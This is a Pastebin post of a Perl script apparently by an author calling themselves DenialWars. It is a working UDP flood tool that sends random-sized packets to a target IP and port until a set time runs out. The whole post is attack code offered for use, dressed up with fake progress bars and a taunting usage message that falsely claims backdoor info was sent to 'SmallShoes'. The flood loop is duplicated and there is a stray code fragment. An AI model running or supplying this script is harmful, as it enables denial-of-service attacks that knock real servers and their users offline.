DenialWars

Percent.pl ( Perl Script )

May 20th, 2017
200
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. use Socket;
  4. use strict;
  5. use Term::ANSIColor;
  6.  
  7. my ($ip,$port,$size,$time) = @ARGV;
  8.  
  9. my ($iaddr,$endtime,$psize,$pport);
  10.  
  11. $iaddr = inet_aton("$ip") or die "Usage:Your Server Just Got Backdoor Info Successful Sented To SmallShoes\n";
  12. $endtime = time() + ($time ? $time : 10000);
  13. socket(flood, PF_INET, SOCK_DGRAM, 17);
  14.  
  15. print "\e[37m Loading…\n\e[0m";
  16. print "\e[31m █▒▒▒▒▒▒▒▒▒\n\e[0m";
  17.  
  18.  
  19. print "\e[37m 10%.\n\e[0m";
  20. print "\e[33m ███▒▒▒▒▒▒▒\n\e[0m";
  21.  
  22.  
  23. print "\e[37m 30%..\n\e[0m";
  24. print "\e[32m █████▒▒▒▒▒\n\e[0m";
  25.  
  26.  
  27. print "\e[37m 50%...\n\e[0m";
  28. print "\e[34m ███████▒▒▒\n\e[0m";
  29.  
  30.  
  31. print "\e[37m 100%....\n\e[0m";
  32. print "\e[35m ██████████\n\e[0m";
  33.  
  34. print "\e[37m Loading Packets\n\e[0m";
  35. print "\e[37m Loaded 1000+ Packets\n\e[0m";
  36. print "\e[37m Sented Packets To $ip\n\e[0m";
  37. print "\e[37m Script Made By DenialWars\n\e[0m";
  38.  
  39. ($size ? "$size-byte" : "sent") . " " .
  40. ($time ? "for $time seconds" : "") . "\n";
  41.  
  42. for (;time() <= $endtime;) {
  43. $psize = $size ? $size : int(rand(1024-64)+64) ;
  44. $pport = $port ? $port : int(rand(65500))+1;
  45.  
  46. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
  47. $iaddr));}for (;time() <= $endtime;) {
  48. $psize = $size ? $size : int(rand(1024-64)+64) ;
  49. $pport = $port ? $port : int(rand(65500))+1;
  50.  
  51. send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
  52. $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment